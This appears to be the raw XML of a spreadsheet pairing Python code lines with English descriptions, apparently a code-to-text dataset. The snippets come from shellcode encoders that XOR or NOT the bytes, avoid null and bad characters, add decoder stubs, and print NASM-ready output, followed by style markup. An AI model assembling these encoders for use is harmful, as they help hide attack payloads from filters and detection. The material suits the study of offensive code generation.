  <si>
    <t>initialize a for loop with an iterator i with a range starting from 0 until the length of shellcode_original with a step of 4</t>
  </si>
  <si>
    <t>x = y - 0x2</t>
  </si>
  <si>
    <t>set x to y minus 0x2</t>
  </si>
  <si>
    <t>output the string "Len: " along with the parameter len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>x = x^rand  # XOR with random number (1-8)</t>
  </si>
  <si>
    <t>assign the variable x the value of the bitwise xor operation of  x and rand</t>
  </si>
  <si>
    <t>elif xxx == '0x0':</t>
  </si>
  <si>
    <t>else if xxx is equal to the string '0x0'</t>
  </si>
  <si>
    <t>print "[i] Encoded format 0x Length: %d" % length_format_0x</t>
  </si>
  <si>
    <t>print string "[i] Encoded format 0x Length: %d" with %d replaced with length_format_0x</t>
  </si>
  <si>
    <t>bad_chars = '\x0a\x00\x0d'</t>
  </si>
  <si>
    <t>initialize bad_chars to the string '\x0a\x00\x0d'</t>
  </si>
  <si>
    <t>xor_byte_good = False</t>
  </si>
  <si>
    <t>set the variable xor_byte_good to the value False</t>
  </si>
  <si>
    <t>z = ~x</t>
  </si>
  <si>
    <t>set the variable z to bitwise not x</t>
  </si>
  <si>
    <t>print 'A byte was Encoded as 0x00 .Try again!!!'</t>
  </si>
  <si>
    <t>print the string 'A byte was Encoded as 0x00 .Try again!!!'</t>
  </si>
  <si>
    <t>print "[i] Encoded format 0x:\t"+ format_0x</t>
  </si>
  <si>
    <t>append format_0x to string "[i] Encoded format 0x:\t", print it to the standard output</t>
  </si>
  <si>
    <t>if len(sys.argv) &gt; 2:</t>
  </si>
  <si>
    <t>if the number of arguments is higher than 2</t>
  </si>
  <si>
    <t>while(xor_byte_good == False):</t>
  </si>
  <si>
    <t>start a while loop with the condition xor_byte_good if equivalent to False</t>
  </si>
  <si>
    <t>encoded_shellcode += "\\x"</t>
  </si>
  <si>
    <t>add the string value '\\x' to the variable encoded_shellcode</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal and add it to the variable encoded</t>
  </si>
  <si>
    <t>if "0x0," in format_0x:</t>
  </si>
  <si>
    <t>if string "0x0," is in format_0x</t>
  </si>
  <si>
    <t>bad_chars = sys.argv[2].replace('\\x', '').decode('hex')</t>
  </si>
  <si>
    <t>remove '\\x' from the second argument, decode it in hexadecimal, and save in bad_chars</t>
  </si>
  <si>
    <t>r = random.randint(1,255)</t>
  </si>
  <si>
    <t>set the variable r to a random integer between 1 and 255</t>
  </si>
  <si>
    <t>encoded_shellcode += "%02x" %(z &amp; 0xff)</t>
  </si>
  <si>
    <t>Convert the value of z bitwise and 0xff to a hexadecimal then added it to the variable encoded_shellcode</t>
  </si>
  <si>
    <t>encoded += '\\x%02x' % rand</t>
  </si>
  <si>
    <t>Convert the variable rand to a hexadecimal and add it to the variable encoded</t>
  </si>
  <si>
    <t>encoded +=  '\\x'</t>
  </si>
  <si>
    <t>print "\n[!] :( WARNING: Output shellcode contains NULL byte(s), consider re-encoding with different offset."</t>
  </si>
  <si>
    <t>print string "\n[!] :( WARNING: Output shellcode contains NULL byte(s), consider re-encoding with different offset." to the standard output</t>
  </si>
  <si>
    <t>shellcode = sys.argv[1].replace('\\x', '').decode('hex')</t>
  </si>
  <si>
    <t>shellcode is the first argument after removing string '\\x' decoded in hexadecimal</t>
  </si>
  <si>
    <t>if (r ^ shellcode_original[i] != 0) and (r ^ shellcode_original[i+1] != 0) and (r ^ shellcode_original[i+2] != 0) and (r ^ shellcode_original[i+3] != 0):</t>
  </si>
  <si>
    <t>check if the following expression is true r bitwise xor shellcode_original at index i is not equal to 0 and r bitwise xor shellcode_original at index i+1 does not equal 0 and r bitwise xor shellcode_original at index i+2 does not equal 0  and r bitwise xor shellcode_original at index i+3 does not equal 0</t>
  </si>
  <si>
    <t>encoded_nasm += "0x"</t>
  </si>
  <si>
    <t>add the string value '0x' to the variable encoded_nasm</t>
  </si>
  <si>
    <t>encoded +=  xxx[2:]</t>
  </si>
  <si>
    <t>slice the variable xxx at index 2 and add the value to the variable encoded</t>
  </si>
  <si>
    <t>encoded = []</t>
  </si>
  <si>
    <t>encoded is an empty list</t>
  </si>
  <si>
    <t>xor_byte_good = True</t>
  </si>
  <si>
    <t>set the variable xor_byte_good to the value True</t>
  </si>
  <si>
    <t>encoded_nasm += "%02x," %(z &amp; 0xff)</t>
  </si>
  <si>
    <t>Convert the value of z bitwise and 0xff to a hexadecimal then added it to the variable encoded_nasm followed by ','</t>
  </si>
  <si>
    <t>Convert the variable x to a hexadecimal. 
Concatenate the result with the string ','
add the result to the variable encoded2</t>
  </si>
  <si>
    <t>insertByte = hex(random.randint(1,255))</t>
  </si>
  <si>
    <t>generate a random integer between 1 and 255 then convert the random number into a hexadecimal and store the value in insertByte</t>
  </si>
  <si>
    <t>print "\n[i] :) Good to go, no NULL bytes detected in output"</t>
  </si>
  <si>
    <t>print string "\n[i] :) Good to go, no NULL bytes detected in output" to the standard output</t>
  </si>
  <si>
    <t>chunk_no = 0</t>
  </si>
  <si>
    <t>chuck_no is integer 0</t>
  </si>
  <si>
    <t>shellcode_encoded.append(r)</t>
  </si>
  <si>
    <t>append the value of the variable r to shellcode_encoded</t>
  </si>
  <si>
    <t>print('Encoded shellcode:')</t>
  </si>
  <si>
    <t>print the string "Encoded shellcode:"</t>
  </si>
  <si>
    <t>encoded2 += '0x%02x,' % rand</t>
  </si>
  <si>
    <t>print "\n[i] Done!"</t>
  </si>
  <si>
    <t>print string "\n[i] Done!" to the standard output</t>
  </si>
  <si>
    <t>stub_has_bad_char = False</t>
  </si>
  <si>
    <t>stub_has_bad_char is boolean False</t>
  </si>
  <si>
    <t>shellcode_encoded.append(shellcode_original[i+3] ^ r)</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i+3 bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>print(encoded_shellcode)</t>
  </si>
  <si>
    <t>print the contents of the variable encoded_shellcode</t>
  </si>
  <si>
    <t>print("-" * 90)</t>
  </si>
  <si>
    <t>print 90 dashes</t>
  </si>
  <si>
    <t>encoded += insertByte[2:]</t>
  </si>
  <si>
    <t>slice the variable insertByte at index 2 and add the value to the variable encoded</t>
  </si>
  <si>
    <t>for char in bad_chars:</t>
  </si>
  <si>
    <t>iterate char over bad_chars</t>
  </si>
  <si>
    <t>shellcode_encoded.append(shellcode_original[i+2] ^ r)</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i+2 bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>print('Shellcode for nasm:')</t>
  </si>
  <si>
    <t>print the string 'Shellcode for nasm:'</t>
  </si>
  <si>
    <t>print("Decoded shellcode:")</t>
  </si>
  <si>
    <t>print the string "Decoded shellcode:"</t>
  </si>
  <si>
    <t>i +=1</t>
  </si>
  <si>
    <t>for byte in decoder_stub:</t>
  </si>
  <si>
    <t>iterate byte in decoder_stub</t>
  </si>
  <si>
    <t>shellcode_encoded.append(shellcode_original[i+1] ^ r)</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i+1 bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>print(encoded_nasm)</t>
  </si>
  <si>
    <t>print the contents of the variable encoded_nasm</t>
  </si>
  <si>
    <t>encoded2 += ','</t>
  </si>
  <si>
    <t>add the string value ',' to the variable encoded2</t>
  </si>
  <si>
    <t>if char == byte:</t>
  </si>
  <si>
    <t>if char is equal to byte</t>
  </si>
  <si>
    <t>shellcode_encoded.append(shellcode_original[i] ^ r)</t>
  </si>
  <si>
    <t>compute the value of shellcode_original at index i bitwise xor r then append to shellcode_encoded</t>
  </si>
  <si>
    <t>print('Shellcode Length: %d' % len(bytearray(encoded_shellcode)))</t>
  </si>
  <si>
    <t>output the string "Shellcode Length: " along with the parameter len(bytearray(encoded_shellcode))</t>
  </si>
  <si>
    <t>print(decoded)</t>
  </si>
  <si>
    <t>print the value of decoded</t>
  </si>
  <si>
    <t>encoded2 += xxx</t>
  </si>
  <si>
    <t>add the value of xxx to the variable encoded2</t>
  </si>
  <si>
    <t>stub_has_bad_char = True</t>
  </si>
  <si>
    <t>stub_has_bad_char is boolean True</t>
  </si>
  <si>
    <t>shellcode_encoded.append(0x90)</t>
  </si>
  <si>
    <t>append the value 0x90 to shellcode_encoded</t>
  </si>
  <si>
    <t>print(decoded2[:-1])</t>
  </si>
  <si>
    <t>print all the values in decoded2 excluding the last value</t>
  </si>
  <si>
    <t>if stub_has_bad_char:</t>
  </si>
  <si>
    <t>if stub_has_bad_char is True</t>
  </si>
  <si>
    <t>shellcode_encoded.append(0xaa)</t>
  </si>
  <si>
    <t>append the value 0xaa to shellcode_encoded</t>
  </si>
  <si>
    <t>encoded2 += insertByte[2:]</t>
  </si>
  <si>
    <t>slice the variable insertByte at index 2 and add the value to the variable encoded2</t>
  </si>
  <si>
    <t>print("Encoded shellcode:")</t>
  </si>
  <si>
    <t>print ' *************';</t>
  </si>
  <si>
    <t>print the string ' *************'</t>
  </si>
  <si>
    <t>decoder_stub_hex = ''.join('\\x{}'.format(hex(ord(x))[2:]) for x in decoder_stub)</t>
  </si>
  <si>
    <t>for each element in decoder_stub convert the element to an integer representing the unicode then convert it to a hexadecimal ignore slice at index 2 until the end and join separating each element by the string '\\x'</t>
  </si>
  <si>
    <t>print ' LEADER BYTE :decimal(%d), HEX(0x%x)'  %(int(sys.argv[1]),leader)</t>
  </si>
  <si>
    <t>print the string ' LEADER BYTE :decimal(%d), HEX(0x%x)' along with the the variable leader and the second command-line argument</t>
  </si>
  <si>
    <t>print '\033[93m[!]\033[00m One or more bad chars were found in the decoder stub\n'</t>
  </si>
  <si>
    <t>shellcode_original_hex = ''.join('\\x{:02x}'.format(x) for x in shellcode_original)</t>
  </si>
  <si>
    <t>store in the variable shellcode_original_hex the hexadecimal values of shellcode_original separated by the string '\\x'</t>
  </si>
  <si>
    <t>print(encoded)</t>
  </si>
  <si>
    <t>while len(shellcode) &gt; 0:</t>
  </si>
  <si>
    <t>while the length of shellcode is greater than integer 0</t>
  </si>
  <si>
    <t>shellcode_encoded_hex = ''.join('\\x{:02x}'.format(x) for x in shellcode_encoded)</t>
  </si>
  <si>
    <t>store in the variable shellcode_encoded_hex the hexadecimal values of shellcode_encoded separated by the string '\\x'</t>
  </si>
  <si>
    <t>print 'Len of Shellcode: %02d' % i</t>
  </si>
  <si>
    <t>output the string 'Len of Shellcode: %02d' along with the parameter i</t>
  </si>
  <si>
    <t>chunk_no += 1</t>
  </si>
  <si>
    <t>add 1 to chunck_no</t>
  </si>
  <si>
    <t>shellcode_encoded_nasm = ''.join('0x{:02x},'.format(x) for x in shellcode_encoded).rstrip(',')</t>
  </si>
  <si>
    <t>store in the variable shellcode_encoded_nasm the hexadecimal values of shellcode_encoded separated by the string '0x' and remove any trailing ','</t>
  </si>
  <si>
    <t>print(encoded2[:-1])</t>
  </si>
  <si>
    <t>print all the values in encoded2 excluding the last value</t>
  </si>
  <si>
    <t>print '------------------------------------------------------------------------';</t>
  </si>
  <si>
    <t>output the string '------------------------------------------------------------------------'</t>
  </si>
  <si>
    <t>xor_byte = 0</t>
  </si>
  <si>
    <t>assign 0 to xor_byte</t>
  </si>
  <si>
    <t>print('[+] Original shellcode (len: {}): {}\n'.format(len(shellcode_original), shellcode_original_hex))</t>
  </si>
  <si>
    <t>print format the string '[+] Original shellcode (len: {}): {}\n' with the parameters of len(shellcode_original) and shellcode_original_hex</t>
  </si>
  <si>
    <t>print '   1. Style:= %s ' % encoded</t>
  </si>
  <si>
    <t>output the string '   1. Style:= %s ' along with the parameter encoded</t>
  </si>
  <si>
    <t>chunk = shellcode[0:2]</t>
  </si>
  <si>
    <t>assign the first two elements of shellcode to chunk</t>
  </si>
  <si>
    <t>print('[+] Encoded shellcode (len: {}): {}\n'.format(len(shellcode_encoded), shellcode_encoded_hex))</t>
  </si>
  <si>
    <t>print format the string '[+] Encoded shellcode (len: {}): {}\n' with the parameters len(shellcode_encoded) and shellcode_encoded_hex</t>
  </si>
  <si>
    <t>print("Shellcode Length:", len(bytearray(shellcode)))</t>
  </si>
  <si>
    <t>output the string "Shellcode Length:" along with the parameter len(bytearray(shellcode))</t>
  </si>
  <si>
    <t>xor_byte = find_valid_xor_byte(chunk, bad_chars)</t>
  </si>
  <si>
    <t>xor_byte is the output of the function find_valid_xor_byte with the input parameters chunk and bad_chars</t>
  </si>
  <si>
    <t>print('[+] Encoded shell in NASM format: {}\n'.format(shellcode_encoded_nasm))</t>
  </si>
  <si>
    <t>print format the string '[+] Encoded shell in NASM format: {}\n' with the parameter shellcode_encoded_nasm</t>
  </si>
  <si>
    <t>print '   2. Style:= %s ' % encoded2</t>
  </si>
  <si>
    <t>output the string '   2. Style:= %s ' along with a parameter encoded2</t>
  </si>
  <si>
    <t>if xor_byte == 0:</t>
  </si>
  <si>
    <t>if xor_byte is equal to 0</t>
  </si>
  <si>
    <t>print('[+] Encoded shellcode /w decoder stub (len: {}): {}\n'.format(len(decoder_stub) + len(shellcode_encoded), decoder_stub_hex + shellcode_encoded_hex))</t>
  </si>
  <si>
    <t>print format the string '[+] Encoded shellcode /w decoder stub (len: {}): {}\n' with the parameters len(decoder_stub) + len(shellcode_encoded) and decoder_stub_hex + shellcode_encoded_hex</t>
  </si>
  <si>
    <t>print 'Failed to find a valid XOR byte to encode chunk'</t>
  </si>
  <si>
    <t>except:</t>
  </si>
  <si>
    <t>declare an except statement</t>
  </si>
  <si>
    <t>exit(2)</t>
  </si>
  <si>
    <t>exit with error</t>
  </si>
  <si>
    <t>print "exiting..."</t>
  </si>
  <si>
    <t>print the string 'exiting...'</t>
  </si>
  <si>
    <t>encoded.append(struct.pack('B', xor_byte))</t>
  </si>
  <si>
    <t>append to encoded a bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>for i in range(0, 2):</t>
  </si>
  <si>
    <t>iterate i over a sequence of number from 0 to 2</t>
  </si>
  <si>
    <t>if i &lt; len(chunk):</t>
  </si>
  <si>
    <t>if i is lower than the length of chunk</t>
  </si>
  <si>
    <t>val2 = int(chunk[i].encode('hex'), 16) ^ xor_byte</t>
  </si>
  <si>
    <t>val2 is the result of the bitwise xor between the integer base 16 of the element i of chunk encoded to hex and xor_byte</t>
  </si>
  <si>
    <t>encoded.append(struct.pack('B', val1))</t>
  </si>
  <si>
    <t>append to encoded a bytes object containing the value val1 packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>add to encoded a bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>shellcode = shellcode[2::]</t>
  </si>
  <si>
    <t>remove the first 2 items from shellcode</t>
  </si>
  <si>
    <t>string1 = decoder_stub.join(encoded)</t>
  </si>
  <si>
    <t>string1 contains a string concatenated with the elements of encoded separated by the value of decoder_stub</t>
  </si>
  <si>
    <t>xor_byte = find_valid_xor_byte(string1, bad_chars)</t>
  </si>
  <si>
    <t>xor_byte is the output of the function find_valid_xor_byte with the input parameters string1 and bad_chars</t>
  </si>
  <si>
    <t>print 'Failed to find a valid XOR byte for the delimiter'</t>
  </si>
  <si>
    <t>exit(3)</t>
  </si>
  <si>
    <t>decoder_stub = decoder_stub.replace('\x45', struct.pack('B', xor_byte))</t>
  </si>
  <si>
    <t>in decoder_stub replace '\x45' with bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>append to encoded the bytes object containing the value xor_byte packed according to the format string unsigned char</t>
  </si>
  <si>
    <t>iterate over bytes in decoder_stub</t>
  </si>
  <si>
    <t>final_shellcode += '\\x' + byte.encode('hex')</t>
  </si>
  <si>
    <t>concatenate in the string final_shellcode the concatenation of '\\x' and the string byte encoded in hexadecimal</t>
  </si>
  <si>
    <t>for byte in encoder:</t>
  </si>
  <si>
    <t>iterate over bytes in encoder</t>
  </si>
  <si>
    <t>print final_shellcode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</si>
</sst>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font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Courier New"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Courier New"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF990055"/>
      <name val="Courier New"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Courier New"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF292929"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF292929"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF0000FF"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF0000FF"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF34A853"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF990055"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FFFF9900"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="10"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF3C4043"/>
      <name val="Roboto"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF3C4043"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF0000FF"/>
      <name val="Docs-Consolas"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="7"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF34A853"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="7"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF990055"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF292929"/>
      <name val="Menlo"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF24292E"/>
      <name val="SFMono-Regular"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF24292E"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <color rgb="FF000000"/>
      <name val="SFMono-Regular"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Consolas"/>
      <family val="2"/>
    </font>
  </fonts>
  <fills count="2">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
  </fills>
  <borders count="1">
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
  </borders>
  <cellStyleXfs count="1">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="79">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="7"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8" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="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left"/>
    </xf>
    <xf numFmtId="0" fontId="2"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3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2"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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
